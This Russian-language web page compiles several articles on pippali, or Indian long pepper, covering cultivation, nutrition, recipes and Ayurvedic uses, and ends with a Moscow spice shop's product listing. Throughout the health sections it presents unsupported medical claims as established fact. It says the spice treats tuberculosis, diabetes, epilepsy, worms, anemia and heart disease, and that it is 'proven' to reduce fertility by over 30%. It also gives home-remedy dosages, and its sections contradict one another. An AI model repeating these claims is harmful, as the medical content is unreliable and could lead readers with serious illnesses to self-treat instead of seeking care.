9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Пиппали перец длинный индийский

Описание индийского перца Пиппали

Индийский перец Пиппали относится к традиционным растениям и широко используется в странах с тропическим климатом (Шри-Ланка, Африка, Индия). Для большинства европейский стран его выращивание и использование – настоящая редкость, или, скорее, экзотика.

Индийский перец Пиппали

Пиппали имеет множество других названий, среди которых: индийский черный (длинный), колосковый перец, лонг и др.

Характеристика

Перец Пиппали является близким родственником обычного черного перца, но имеет более жгучий и, в то же время, насыщенный сладкий вкус. Он широко используется в качестве пряности при приготовлении различных блюд и, особенно, маринадов. Нельзя не упомянуть о том, что растение используется в народной медицине многих восточных стран, поскольку имеет огромное количество лечебных свойств.

Описание растения

Растение представлено длинной вьющейся лианой. Оно нуждается в подвязке на опору, поскольку длина может достигать 1,5 м.

Листья среднего размера (от 5 до 9 см) крепятся длинными черешками. Они имеют вытянутую форму и немного вздутую поверхность пластинки.

Описание плодов

Острый перец Пиппали имеет плоды, которые отдаленно напоминают стручок гороха или сережку березы. Он состоит из близко расположенных на тонком стебле небольших горошин. Благодаря этому, существует еще одно название растения – колосковый.

Вкус свежих и высушенных плодов значительно отличается. В первом случае плоды сладкие, послевкусие немного охлаждающее. Высушенные плоды имеют вкус острый и пряный с согревающим эффектом.

Индийский длинный перец имеет ярко выраженный аромат с оттенками муската, хвои и черного чая.

Выращивание и уход

При большом желании, практически каждый может вырастить Пиппали у себя дома. Условия для этого совпадают с теми, которые используют, выращивая обычный черный или красный перец.

Для посадки нужно выбирать только лучшие семена. Их опускают в землю, приблизительно, на 1 см. От посева до появления всходов может пройти достаточно времени (иногда и месяц).

Садим самые лучшие семена

После того, какони проросли, их следует пересадить в отдельные горшочки и обеспечить им уход:

  • Культуре необходимы регулярные и обильные поливы в летнее время, а в зимнее – умеренные, но постоянные. Отследить то, когда следует увлажнять почву, поможет ее верхний слой: как только он начинает подсыхать, нужно проводить полив.
  • Поскольку растение относится к теплолюбивым, необходимым является поддержание высокой температуры в летнее время (22-25°), лишь зимой ее следует понижать до 18°, поскольку растения в этот момент находятся в состоянии покоя.
  • Во избежание болезней, нужно поддерживать высокую влажность воздуха в помещении и регулярно осуществлять подкормку растений. Последнюю необходимо проводить не реже, чем в раз в две недели в период с начала весны и до самой осени. Чаще всего используют минеральные удобрения.
  • Также необходимо обеспечить хорошее круглогодичное освещение для культуры. Желательно, чтобы свет был рассеянным.
  • Пересадка также является необходимым составляющим ухода. Молодые растения следует пересаживать каждый год, взрослые – раз в два года.
  • Почву необходимо рыхлить регулярно.

Применение Пиппали

Индийский острый длинный перец Пиппали является неотъемлемой частью тайской, индийской, арабской кухни. Европейцы же используют его довольно редко.

Благодаря вкусовым качествам индийского острого перца Пиппали (жгучий и сладкий одновременно), он часто используется для маринадов к мясу, грибам и др.

В медицине и косметологии

О лечебных свойствах Пипа стало известно давно. Считается, что он благотворно влияет на работу ЖКТ, улучшает метаболизм, способствует выведению токсинов и шлаков из организма. Благодаря этому, снижается вес, улучшается состояние кожных покровов. Он также помогает справиться с тошнотой и рвотой, запорами, метеоризмом и тяжестью.

Благодаря своему согревающему эффекту, Пиппали помогает организму справиться с различными заболеваниями, повышает иммунитет. Его часто используют в качестве жаропонижающего, и, также, профилактического средства для предотвращения вирусных заболеваний.

Также он имеет успокоительное свойство, положительно влияет на нервную систему и качество сна, помогает при заболеваниях кровеносной системы. Благотворно воздействует и на половые органы и репродуктивную систему, улучшая их функцию.

Перец широко используется в косметологии. Он входит в состав средств, обладающих омолаживающим и тонизирующим эффектом.

Противопоказания к применению

Не смотря на огромное количество лечебных свойств индийского острого длинного перца, лучше воздержаться от его употребления при наличии каких-либо воспалений в организме. Полностью исключить пряность следует при планировании беременности (имеет противозачаточный эффект) и менструациях.

Пиппали — длинный черный перец, похожий на шишки

Содержание статьи:

  • Состав и калорийность
  • Полезные свойства
  • Вред и противопоказания
  • Как приготовить
  • Рецепты блюд
  • Интересные факты

Перец пиппали — это плоды тропического растения из семейства Перечные. Не менее известен он и под названием «индийский длинный перец». В большинстве случаев его сушат перед использованием, в результате чего он приобретает цвет от светло-коричневого до кофейного. Форма у него овальная, поверхность неровная, с многочисленными шероховатостями, из-за чего пиппали похож на шишки, примерная длина которых — 6 см. Этот перец относится к специям, вкус у него чуть-чуть сладкий с горьким оттенком, запах резкий и пряный. Родиной растения считается Индонезия, Шри-Ланка и Индия. Это важный компонент в азиатской и африканской кухнях. В кулинарии используется в основном в качестве приправы для приготовления разных маринадов.

Состав и калорийность перца пиппали

В продукте содержится огромное количество разных витаминов, макро- и микроэлементов, жирных кислот и усвояемых углеводов. По своему составу специя похожа на другие перцы, в особенности на черный горошком. Тут также имеются важные для человека пищевые волокна, зола и вода.

Калорийность длинного черного перца на 100 г составляет 255 ккал, из них:

  • Белки — 10.9 г;
  • Жиры — 3.2 г;
  • Углеводы — 38.3 г;
  • Пищевые волокна — 22.1 г;
  • Вода — 9.8 г;
  • Зола — 3.7 г.

За специфичный вкус и запах ответственны эфирные масла, насыщенность плодов которыми превышает 10%. Они могут похвастаться и большим количеством капсаицина, необходимого для нормальной работы иммунной системы и защиты организма от преждевременного старения. Около 1-2% в составе занимает алкалоид пиперина, открытый еще в 1819 году; согласно исследованиям, он улучшает усвояемость других веществ.

Употребляя длинный индийский черный перец, организм будет получать жизненно важные витамины группы B (B1, B2, B5, B12), аскорбиновую кислоту (С), биотин (Н), никотиновую кислоту (РР). Вместе со всем этим удастся насытить кровь различными минеральными веществами — селеном, медью, марганцем, которых в составе достаточно много. В небольшом количестве здесь содержится и кальций, магний, цинк, марганец, медь, селен. Полезным окажется натрий, фосфор, железо.

В состав длинного черного перца пиппали, кроме всего прочего, входят фитостеролы, помогающие снизить уровень холестерина в крови. Дополняют их легко усвояемые углеводы в виде моно- и дисахаридов, дарящие энергию.

Специя богата и на некоторые жирные кислоты, среди которых лауриновая, пальмитиновая, олеиновая, линоленовая, линолевая и миристиновая, Омега-3 и Омега-6.

Полезные свойства перца пиппали

Еще со времен Древнего Рима пиппали известен как очень действенный афродизиак, который использовался для усиления полового влечения. Также он обладает противоглистными, ветрогонными, отхаркивающими, антисептическими, обезболивающими, стимулирующими, кроветворными и бодрящими свойствами. Показаниями к его включению в рацион являются подагра, ревматизм, ларингит, астма, метеоризм. Специю рекомендуется использовать и при заражении гельминтами, при расстройствах пищеварения и эпилепсии, при повышенном артериальном давлении.

Стоит присмотреться к длинному черному перцу, если нужно сделать следующее:

    Устранить глистную инвазию. Специя отлично справляется с аскаридами, острицами, эхинококками, бычьим цепнем, описторхозом. Особенно хорошо пряность подавляет активность Helicobacter pylori. Она просто-напросто создает неподходящую для деятельности чужеродных агентов атмосферу, ощелачивая организм. Таким образом риск развития гастрита, колита, язвы желудка и кишечника снижается в два раза.

Улучшить аппетит. Пиппали нормализует метаболизм, ускоряет усвоение питательных веществ из пищи, выводит из организма продукты распада деятельности патогенных микроорганизмов. Все в совокупности позволяет восстановить режим питания и избежать визита к гастроэнтерологу.

Нормализовать работу мозга. Этот перец усиливает приток крови к нему, заставляя работать активнее. Он улучшает умственную деятельность, укрепляет кратко- и долговременную память, что особенно полезно для тех, кто занят интеллектуальным трудом.

Восстановить функции органов ЖКТ. Специя тонизирует стенки желудка и кишечника, не допускает их воспаления и улучшает пищеварение. Ее рассматривают как эффективное желчегонное средство, которое в дополнение ко всему понижает уровень соляной кислоты.

Облегчить кашель. Пиппали актуален при любых ЛОР-заболеваниях вне стадии обострения. Его рекомендуют применять в случае ларингита, фарингита, тонзиллита, трахеита, бронхита, ангины. Благодаря ему восстанавливается лимфоток, улучшается кровообращение в тканях, снимается воспаление и подавляется активность стрептококка, стафилококка и других опасных бактерий.

Предотвратить преждевременное старение. Это касается как внешнего вида, так и внутреннего здоровья. Перец черный длинный является очень сильным антиоксидантном, защищающим клетки от разрушительного воздействия токсинов, солей тяжелых металлов, УФ-лучей, стресса, деятельности вредных бактерий. Он активно используется в аюрведической культуре именно как средство для продления молодости.

Очистить организм. С помощью пиппали можно вывести из организма все шлаки, токсины, остатки каловых масс. Это минимизирует риск роста новообразований, не допускает развития инфаркта и других сердечных заболеваний, предотвращает появление сахарного диабета и отложение жиров. Изменения в лучшую сторону ощущает на себе в первую очередь печень, которая является фильтром всего «мусора». В итоге проходит боль и тяжесть в правом подреберье, снижается вероятность заболевания гепатитом, механической желтухой, циррозом.

Восстановить работу иммунной системы. В результате употребления длинного черного перца она укрепляется, что способствует повышению уровня защиты организма от патогенных микроорганизмов. Благодаря этому также минимизируется риск простудиться и пострадать от авитаминоза.

Устранить анемию. Пиппали увеличивает количество железа в крови, потому и борется эффективно с этой проблемой. Это стоит учесть всем тем, у кого уровень гемоглобина находится на уровне ниже 120 г/л. В первую очередь речь идет о беременных женщинах и детях, а также о последователях вегетарианства.

  • Улучшить работу сердечно-сосудистой системы. Этот вид перца эффективен в профилактике и борьбе со стенокардией, аритмией, ишемией и другими кардиологическими заболеваниями. Он отлично проявил себя в диетах людей, страдающих от повышенного давления, варикозного расширения вен и тромбофлебита.
  • Полезные свойства перца пиппали проявляются только при его употреблении в сыром виде или после минимальной термической обработки. Именно поэтому специю рекомендуется добавлять в блюдо по возможности перед его снятием с плиты.

    Вред длинного черного перца

    Употребляя пряность, не стоит забывать про ее жгучие свойства, из-за которых она может привести к ожогу слизистых оболочек желудка и кишечника. Учитывая это, специю нельзя есть в чистом виде, и тем более без воды. После этого во рту может сильно печь, так, что понадобится выпить большое количество жидкости. Иногда в результате этого возникают изжога и боли в желудке.

    Следует отметить такие противопоказания к перцу пиппали:

      Чрезмерная жажда. Этот ингредиент восточной кухни может ее еще больше усилить из-за своего резкого и острого вкуса и запаха.

    Менструация. Девушкам в «критические дни» нельзя употреблять ничего из продуктов, увеличивающих кровообращение. Это может привести к большим потерям крови и, как следствие, к ухудшению самочувствия, вплоть до потери сознания.

    Беременность. Будущие мамы очень подвержены развитию аллергических реакций, которые вполне могут стать следствием употребления перца. Важно и то, что таким образом из-за воздействия бодрящих эфирных масел они рискуют раздражаться еще больше, с чем в интересном положении и так существуют проблемы.

    Планирование ребенка. Желающим его завести избегать этого продукта следует в силу его ярко выраженных противозачаточных свойств. Доказано, что вероятность забеременеть в этом случае снижается более чем на 30%.

  • Кормление грудью. При лактации необходимо максимально ограничить употребление любого перца, который может придать вкусу молока горечь. Это рискует повлечь за собой отказ ребенка от него, что приведет к преждевременному завершению лактации.

Острый перец пиппали не рекомендуется употреблять непосредственно перед сном, после этого должно пройти минимум 2-3 часа. В противном случае все может обернуться бессонницей и утренней мигренью.

Как приготовить длинный черный перец

Собранные плоды сначала нужно хорошо промыть, дать им стечь, после чего их следует сушить в теплое время на солнце в течение 2-3 дней по 5-6 часов в сутки, а в холодное — в духовом шкафу при минимальной температуре. Здесь их необходимо выдерживать за один подход около 40-60 минут, этого времени вполне достаточно для вывода из них влаги.

Сушеные плоды измельчают с помощью кофемолки или ступки до состояния порошка, который перед приготовлением того или иного блюда лучше обжаривать на сковороде без масла. Таким образом, сдобренная им пища получится более ароматной.

Не рекомендуется использовать сразу много плодов, достаточно переработать их на 1-2 готовки. Проблема в том, что порошок быстро впитывает влагу, после чего теряет пикантный вкус, а вместе с ним и часть своих полезных веществ.

Рецепты блюд с перцем пиппали

В большинстве случаев эта специя используется с целью приготовления различных маринадов для мяса, грибов, рыбы и даже овощей. Пряность прекрасно дополняет вкус куркумы, имбиря, кориандра, сушеного укропа и базилика. Блюда с ней получаются острыми, но приятными по ощущениям, при этом они могут быть как первыми, так и вторыми. Обычно вполне достаточно класть 1-2 щепотки специи за раз в уже готовую пищу.

Мы подобрали самые простые и любопытные рецепты с перцем пиппали, которые не потребуют от вас много времени:

    Маринад. На 500 г мяса его необходимо примерно 250 мл. Соедините стакан уксуса с измельченным перцем (0,5 ч. л.), лавровым листом (3 шт.), разделенной на кольца луковицей (1 шт.), морской солью по вкусу и пучком петрушки. Хорошо помешайте массу и погрузите в нее нужные продукты.

Салат «Цезарь». Замаринуйте куриное филе (300 г) в смеси из сока лимона (1 ст. л.), соевого соуса (150 мл), пиппали (3 щепотки), соли по вкусу и чеснока (2 зубка). Через 60 минут измельчите мясо, нарежьте кубиками вчерашний белый батон (250 г) и обжарьте их по очереди в оливковом масле до золотистой корочки. Затем выложите на тарелку послойно листья салата (100 г), курицу, полейте ее соусом «Цезарь». После этого добавьте тертый пармезан (75 г), помидоры черри (50 г) и посыпьте все молотым перцем.

Запеченная рыба. Помойте, посолите, поперчите и выложите в глубокую форму 3 филе хека средних размеров. После этого полейте их соком лимона и соусом из сметаны (5 ст. л.) и майонеза (3 ст. л.), посыпьте тертой морковью (3 шт.) и картошкой, нарезанной кружочками (5 шт.). Притрусите овощи солью и перцем пиппали, выложите кольца лука (2 головки) и аккуратно вылейте оставшийся соус. Поставьте форму в духовку на 40-50 минут и держите там рыбу до готовности.

  • Суп харчо. Отварите говядину (300 г) в 3 л воды и положите в бульон заранее замоченный длинный рис (150 г). Затем обжарьте лук (1 шт.), морковь (1 шт.), чеснок (3 зубка) и помидоры (2 шт.) вместе с кожурой. Потом почистите картофель (3 шт.), нарежьте его кубиками, соедините все ингредиенты и добавьте их к рису. Варите суп 20 минут, после чего посыпьте его перцем пиппали, зеленью петрушки, кинзы, укропа и солью по вкусу.
  • Интересные факты про длинный черный перец

    Длинный черный перец в русской кухне, как и в остальных европейских, плохо прижился. Больше всего все-таки его употребляют жители Индии, Шри-Ланки, Эфиопии и других африканских стран. Для СНГ он является довольно экзотичной специей, которая к тому же еще и дорого стоит, в 2-3 раза больше, чем тот же молотый черный перец.

    В чистом виде на рынке найти длинный индийский перец пиппали практически не представляется возможным. Чаще всего предлагаются уже готовые композиции, например, в виде порошка «Трикату», готовящегося по старинным аюрведическим рецептам. Обычно он расфасован в упаковки объемом 10 г, в него включается также молотый имбирь и красный перец.

    Свое название специя получила из-за вытянутой овальной формы. Лидером по ее производству считается Эфиопия, именно оттуда завозят товар в большинство магазинов. Он может храниться больше года при отсутствии повышенной влажности. Для этого его рекомендуется сразу же измельчать и пересыпать в банки.

    Смотрите видео о перце пиппали:

    Пиппали (Pippali)

    Pippali — длинный перец, уникальная специя. Он обладает всеми качествами специй, полезных при расстройстве желудка, астме, кашле и т.д., при этом очень хороший афродизиак и омолаживающая специя.

    Ботаническое название — Piper Longum Linn.

    Растет в наиболее жарких частях Индии, от Гималаев до Ассама, Khasi и Mikir. Также найдено в лесу Западных Гат от Конкана до Керала.

    Urdhvabhagahara — группа трав , используемых при несбалансированных Дош оральным и назальным путем посредством Ваманы и Насья лечения.
    Trayushana (Трикату) — входит в состав Трикату
    Shiro virechana — группа трав, используемых в лечении Насья
    Deepaneeya — группа трав , которые улучшают пищеварение
    Kantya — группа трав , которые хороши при болезнях горла
    Asthapanopaga — группа трав полезных в отваре клизмы (Asthapana Basti)
    Shiro Virechanopaga — группа трав, полезной при балансировке дош в голове и шее
    Sitha Prashamana — группа трав, подавляющих простуду, кашель.
    Shoola Prashamana — группа трав , полезных при брюшной боли, коликах
    Kasahara — группа трав, полезных против кашля
    Hikkanigrahana — группа трав , которые помогают контролировать икоту
    Trptighna — группа травы, помогающих при псевдо-сытости
    Vamanopaga — группа трав , полезных в Vamana Панчакарме — лечении рвоты.

    Целебные свойства
    Rasa (вкус) — Katu (острый)
    Guna- Laghu, Teekshna (легкий, жесткий)
    Vipaka- Maghura — Сладкий вкус после переваривания
    Вирья — Ushna — согревающий (свежий — охлаждающий)
    Влияние на тридоша — балансирует Вату и Капха Доши (свежий увеличивает Капха Доша).

    Используются как плоды, так и корень. Тут рассмотрим только плоды.

    Обычно используют дозу 0,5-1 грамм один или несколько раз в день, обычно после еды.

    Свежий плод длинного перца:
    Shleshmala — увеличивает капха доша
    Madhura — сладкий
    Guru — тяжелый
    Snigdha — сладкий, маслянистый
    Pittahara — балансирует Питта Доша.

    Сухой плод длинного перца:
    Kapha Vataghni — балансирует Капха и Вата Доши
    Katu — острый
    Ushna — согревающий
    Vrushya — афродизиак
    Pitta Avirodhini — не увеличивает Питту в значительной степени
    Deepani — улучшает пищеварение
    Rasayani — против старения, омолаживающий
    Anushna — не очень горячий
    Snigdha — маслянистый
    Rechani — очищает кишечник
    Shwasahara — полезен при астме, хроническом обструктивном заболевании легких и других респираторных заболеваниях
    Kasahara — помогает при кашле, простуде
    Udarahara — полезен при вздутии живота из-а накопления жидкости
    Kushtahara — полезен при кожных заболеваниях
    Pramehahara — полезен при сахарном диабете
    Gulmahara — полезно при опухоли в брюшной полости
    Arshahara — полезен при геморрое
    Amanut — полезен при расстройстве желудка, удаляет Аму
    Marutahara — полезно при Вата-дисбалансе
    Pittaprakopini — немного увеличивает Питта
    Kshayapaha — полезен при хронических заболеваниях легких, туберкулезе.

    Длинный перец для борьбы с лишним весом:
    Pippali принимают вместе с медом приизлишней полноте, при капха-дисбалансах, таких как простуда, кашель, астма, лихорадка. Такое сочетание улучшает пищеварение, действует как афродизиак и Medhya — улучшает интеллект.

    Длинный перец для лечения астмы, анемии:
    Одну часть порошка длинного перца и две части джаггрери (пальмовый сахар) смешивают и принимают, чтобы облегчить кашель, астму, анемию, сердечные расстройства и при глистных инвазиях.

    Pippali при туберкулезе:
    Длинный перец очень полезен для повышения прочности легких, потому что он является омолаживающим средством, а также потому , что он улучшает аппетит, а это помогает избежать потери веса, связанного с туберкулезом. Он также помогает предотвратить повреждение печени, к чему иногда приводит прием лекарственных средств , используемых при лечении туберкулеза.

    При ревматоидном артрите:
    Отвар корня (Мула Кашая) из травы под названием Патала Гаруди (Cocculus hirsutus) принимают вместе с Pippali при лечении Amavata — ревматоидный артрит.

    Не является идеальным для долгосрочного употребления без процедуры Панчакарма.

    ПЕРЕД УПОТРЕБЛЕHИЕМ ПРОДУКТА, КАК ЛЕКАРСТВА, ОБЯЗАТЕЛЬHО ПРОКОHСУЛЬТИРУЙТЕСЬ СО СВОИМ ВРАЧОМ!

    Пиппали (Pippali) — индийский длинный перец

    Длинный перец пиппали (Pippali) нашел широкое применение в аюрведической медицине, особенно из-за его способности улучшать пищеварительный огонь (Агни) и сжигать токсины (Аму). Пиппали может быть отличной травяной поддержкой в любое время года. Однако, благодаря своим мощным свойствам очищения и омоложения легких, наилучшее время для его употребления – это весенний сезон (Капхи). Хотя весна ассоциируется у нас со многими прекрасными аспектами, это время года также хорошо известно как сезон аллергии, застоя, простуды и кашля. Аюрведа утверждает, что весенний сезон является основным временем года для Капха доши и поэтому дисбалансы Капхи, будут процветать. Добавление длинного перца пиппали в свой рацион весной станет отличным дополнением к тому, чтобы избежать общих проблем, которые приносит этот сезон. Пиппали намного мягче, чем его родственник черный перец, поэтому пиппали можно даже умеренно использовать и Питтам из-за его сладкого послевкусия (випака).

    Таким образом, пиппали может быть безопасным и эффективным вариантом для большинства расстройств пищеварения, даже когда Питта увеличивается в организме. Обратите внимание, что это очень сильнодействующая растительная специя , и ее следует использовать только в небольших дозах (не более 1-3 гр. в сутки), хотя Капхи обычно могут себе позволить взяв немного больше (до 5 гр. в сутки).

    АЮРВЕДИЧЕСКИЕ КАЧЕСТВА ПИППАЛИ
    Вкус (раса) острый
    Энергетика (вирья) немного согревающая
    Послевкусие (випака) сладкий
    Качества (гуна) Легкий (лагху), влажный/ маслянистый (снигдха), проникающий (сукшма)
    Влияние на доши Уменьшает Вату и Капху, увеличивает Питту (при избыточном употреблении)
    Воздействие на ткани (дхату) Плазма, кровь, жировая ткань, костный мозг, репродуктивная ткань
    Действие на системы организма Пищеварительная, дыхательная и репродуктивная. Обладает болеутоляющим, антигельминтным, ветрогонным, отхаркивающим действием. Афродизиак.
    Дозы и продолжительность использования В профилактических целях – 1 гр. в течении 2-3 месяцев, в лечебных целях – 3-5 гр. до исчезновения симптомов заболевания. Максимальная доза – 5 гр.
    Противопоказания Избыточная Питта доша, заболевания кишечника
    Фитохимия

    Наиболее заметным ингредиентом пиппали является пиперин (до 5%) – алкалоид, который отвечает за остроту различных сортов перечных.

    Полезные свойства длинного перца пиппали
    • Очищает кровь;
    • Улучшает пищеварение;
    • Уменьшает газы и вздутие живота;
    • Очищает организм, особенно дыхательную систему;
    • Уменьшает лихорадку;
    • Улучшает состояние при простудных заболеваниях;
    • Улучшает состояние кожи и цвет лица;
    • Уменьшает геморрой;
    • Обладает антимикробным, анти-паразитарным и антисептическим действием;
    • Улучшает работу печени, желчного пузыря и селезенки;
    • Уменьшает менструальные расстройства (аменорея и дисменорея);
    • Усиливает память и интеллект;
    • Улучшает кровообращение;
    • Увеличивает мобильность сперматозоидов;
    • Увеличивает сексуальную активность (как мужчин, так и женщин – импотенция, низкое либидо, преждевременная эякуляция);
    • Способствует уменьшению веса тела;
    • Увеличивает воздействие других трав при совместном использовании;
    • Уменьшает боли при подагре и ревматоидном артрите.

    Длинный перец Пиппали широко используется в аюрведической фармакологии и входит в состав многих традиционных лекарственных препаратов:

    • Трикату Чурна (Trikatu Churna)
    • Сарасвати Чурна (Saraswati Churna)
    • Хингваштак Чурна (Hingwashtak Churna)
    • Махасударштан Чурна (Mahasudarshan Churna)
    • Тикта Грита (Tikta Grita)
    ПРИМЕНЕНИЕ ПИППАЛИ

    Пиппали обладает широким спектром различных преимуществ для нашего здоровья, и поэтому существует множество способов использования пиппали в домашней аптечке. Простой способ получить многочисленные преимущества пиппали в качестве профилактического средства – это ежедневно использовать его вместо черного перца (или в дополнение к нему), добавляя при приготовлении пищи. В качестве лекарственного средства длинный перец пиппали применяют в следующих дозах:

    Заболевания Способ применения
    Аллергия, кашель, простуда, застой слизи Смешайте ¼ ч. ложки куркумы, ¼ ч. ложки имбиря (сухого), 1/8 ч. ложки пиппали, 1 ч. ложка меда и ½ стакана теплой воды. Принимать утром и днем
    Лихорадка, грипп Смешайте ¼ ч. ложки пиппали в 1 стакане имбирного чая, добавьте 1 ч. ложку меда. Принимать 3 раза в день
    Геморрой Возьмите ½ стакана домашнего йогурта и ¼ ч. ложки пиппали. Принимать ежедневно после завтрака и после обеда
    Менструальные расстройства Смешайте в ½ стакане теплой воды 2 ст. ложки сока алоэ вера и 1/8 ч. ложки пиппали. Принимать 3 раза в день перед едой
    Кожные проблемы Смешайте в ½ стакане теплой воды 2 ст. ложки сока алоэ вера, ¼ ч. ложки куркумы и 1/8 ч. ложки пиппали. Принимать 3 раза в день во время еды
    Низкое либидо (мужчины) Смешайте в ¼ стакана теплой воды ½ ч. ложки ашвагандхи, 1/8 ч. ложки пиппали и 1 ч. ложки топленого масла (Гхи). Принимать 3 раза в день до еды
    Низкое либидо (женщины) Смешайте в ¼ стакана теплой воды ½ ч. ложки шатавари, 1/8 ч. ложки пиппали и 1 ч. ложки топленого масла (Гхи). Принимать 3 раза в день до еды
    Метеоризм Возьмите 1 г порошка пиппали и 2 г соли, смешайте с ½ стакана домашнего йогурта. Принимать 3 раза в день после еды
    Ожирение Смешайте ¼ ч. ложки пиппали с ½ ч. ложкой меда, принимать, запивая водой 2 раза в день на протяжении 2-3 месяцев
    Бессонница Смешайте 2-3 гр. пиппали и 1 ч. ложку меда в стакане с водой и выпить за 30-40 минут до сна
    Зубная боль Смешайте по ¼ ч. ложки пиппали, куркумы и соли с горчичным маслом до получения пастообразного состояния, нанесите на больной зуб
    Икота Смешайте по ¼ ч. ложки перца пиппали, корня солодки и сахара в стакане воды, добавьте немного сока лимона
    Увеличение печени Принимая 3 гр. пиппали с медом два раза в день помогает уменьшить увеличенную печень
    Использование пиппали в кулинарии

    Бесспорно, перец пиппали, как настоящий перец обладает острым вкусом и приятным ароматом, но он немного мягче, чем многие другие сорта перца. Перец пиппали – прекрасное дополнение к блюдам из домашней птицы, рыбы, овощей, мунг дала или чечевицы. Еще в древние времена длинный перец пиппали использовали в кулинарии из-за его острого вкуса и пряного аромата. В настоящее время его вытеснили с рынка черный перец и перец чили, как более дешевые аналоги. Однако, те, кто понимает всю ценность пиппали, продолжают использовать его в разных рецептах, включая некоторые десерты, поскольку он имеет сладкое послевкусие (випака) и улучшает пищеварение. Поэтому длинный перец пиппали используют не только в лечебных целях, но и является хорошим дополнением при приготовлении различных блюд, способствуя нормализации пищеварения и усиления пищеварительного огня (Агни).

    Суп из мунг дала с пиппали

    Ингредиенты Влияние на доши Количество Способ приготовления
    Помидоры (средние) В↑ П↑ К↑ 4 шт. Воду доведите до кипения, добавьте предварительно замоченный на ночь мунг дал, варите на медленном огне 40-45 минут. Растопите топленое масло на сковороде, добавьте семена горчицы, пиппали, тмин, имбирь, куркуму, асафетиду. Прокалите специи 2-3 минуты, добавьте раздавленный чеснок, соль, сахар. Помидоры мелко нарезать, добавить в кастрюлю с мунг далом. Через 5-7 минут добавить смесь специй и лимонный сок, оставить на огне еще на 3-5 минут. При подаче на стол украсить рубленной кинзой
    Мунг дал или чечевица ВПК=, К↑ (при избыточном употреблении)*

    П↓ К↓В↑ (при избыточном употреблении)**

    ¾ стакана
    Вода В↓ П↓ К↑ 6 стаканов
    Кинза ВПК= 2 ст. ложки
    Пиппали (молотый) В↓ К↓ П↑ (при чрезмерном употреблении) ¼-1/2 ч. ложки
    Чеснок В↓ П↑ К↓ 1 зубчик
    Тмин В↓ П↑ К↓ 1 ч. ложка
    Семена горчицы В↓ П↑ К↓ 1 ч. ложка
    Имбирь (молотый) В↓ К↓П↑ (при избыточном употреблении) ½ ч. ложки
    Куркума В↓ К↓П↑ (при избыточном употреблении) ½ ч. ложки
    Асафетида В↓ П↑ К↓ ½ ч. ложки
    Топленое масло (Гхи) В↓ П↓ К↑ (при чрезмерном употреблении) 2 ст. ложки
    Лимонный сок В↓ П↑ К↓ 1-2 ст. ложки
    Тростниковый сахар В↓ П↓ К↑

    1 ст. ложка
    Соль В↓П↑К↑ ½ ч. ложки
    ФРУКТОВЫЕ ТРЮФЕЛИ

    Ингредиенты Влияние на доши Количество Способ приготовления
    Финики В↓ (замоченные) П↓ К↑ ½ стакана Финики, инжир, курагу и изюм нарезать на мелкие кусочки. Добавить измельченный миндаль (предварительно замочить на ночь и удалить кожицу) и слегка поджаренный кешью, тщательно все перемешать руками, добавить кокосовое или топленое масло (Гхи) до состояния однородной пасты. Затем добавьте половину меда, перец пиппали, мускатный орех и хорошо перемешайте еще раз. Скатайте из смеси небольшие шарики, обмакните в мед и обваляйте в поджаренных семенах кунжута. Поместите шарики на тарелку и поставьте в холодильник на 15-20 минут. Готовые фруктовые трюфели можно хранить в закрытом контейнере при комнатной температуре сроком до десяти дней.
    Инжир В↑ П↑ К↑ ½ стакана
    Изюм В↓ (замоченный) П↑ К↑ ¼ стакана
    Курага В↓ (замоченная) П↑ К↓ ¼ стакана
    Миндаль В↑ П↑ К↑ ½ стакана
    Кешью В↑ П↑ К↑ ½ стакана
    Мед В↓ П↑ К↓ ½ стакана
    Кунжут В↑ П↑ К↑ ½ стакана
    Кокосовое масло или топленое масло (Гхи) В↓ П↓ К↑*

    В↓ П↓ К↑ (при чрезмерном употреблении)**

    2 ст. ложки
    Пиппали (молотый) В↓ К↓

    П↑ (при чрезмерном употреблении)

    2 ч. ложки
    Мускатный орех ВПК= 1 ч. ложка

    **Топленое масло (Гхи)

    Длинный перец пиппали снижает избыточную массу тела, помогает сжигать токсины (Аму) в жировой ткани и препятствует их образованию из-за нарушения пищеварения. Пиппали эффективно улучшает усвоение питательных веществ, минералов и витаминов, уменьшает ожирение, очищает кожу, разглаживает морщины и замедляет процессы старение .

    Пиппали очищает легкие, наполняет легочную ткань дополнительной энергией для предотвращения кашля , лихорадки, астмы, бронхита, ларингита и пневмонии .

    Пиппали уже давно используется для укрепления костей и поддержания целостности скелета, уменьшает боли в спине, артрит, ревматизм, переломы, растяжения.

    Согревающие качество пиппали улучшает кровообращение и тонизирует сердечную мышцу. С улучшенной циркуляцией все жизненно важные органы насыщены кислородом и функционируют более эффективно.

    Перец Ява (Пиппали) 50г

    Курьерская доставка по Москве -190 руб.,
    по Московской области — 300 руб.

    При заказе от 4 000 р. —
    скидка 5%.

    Перец Ява (Пиппали) — это очень острый и один из древнейших аюрведических ингредиентов, который применяется для выравнивания всех трех дош и иных целей. В период высушивания вкус перца пиппали меняется с охлаждающего и сладкого на жгучий и острый.

    Если Вы не увлекаетесь аюрведой то перец будет полезен для Вас как приправа. Он добавляется к мясу, соевым продуктам, салатам. Часто из него делается маринад для тофу или чечевицы.

    Перец Ява отлично исцеляет болезни бронхов, кашель и заболевания легких. Незаменим при бронхиальной астме. Выводит токсины из кишечника, очищает организм, помогая ему избавиться от паразитов. Перец пиппали успокаивает нервную систему и улучшает сон, а употребляя его днем – Вы стимулируете Вашу мозговую деятельность. Также Пиппали стимулирует иммунитет и является мощнейшим афродизиаком.

    Состав перца Ява (Пиппали):

    100% перец пиппали (Ява).

    Вам также могут понравиться

    Наличие в магазинах:

    Магазин «Ашанти» на Белорусской: 5 шт.

    г. Москва, м. Белорусская ( 2 минуты пешком), ул.Нижняя, д. 3; тел. +7 (499) 257 00 01

    Магазин «Ашанти» на Проспекте Мира: 3 шт.

    г. Москва, м. Проспект Мира ( 40 метров от метро ), ул. Проспект Мира д. 40; тел. +7 (495) 136 96 69

    Магазин «Ашанти» на Площади Ильича: 11 шт.

    г. Москва, м. Площадь Ильича ( 1 минута пеш.) ул. Сергия Радонежского 29-31 ст 4; тел. +7 (495) 678 63 91

    Магазин «Ашанти» на Добрынинской: 6 шт.

    г. Москва, м. Добрынинская ( 1 минута пеш.) ул. Большая Серпуховская д. 1211 ст 2; тел. +7 (499) 236-63-74

    Магазин «Ашанти» в Митино: 12 шт.

    г. Москва, м.Митино, ул.Митинская 36 к1, ТЦ Ковчег; тел. +7 (495) 324-77-78

    Как получить баллы

    Дорогие друзья магазина восточных товаров «Ашанти»!

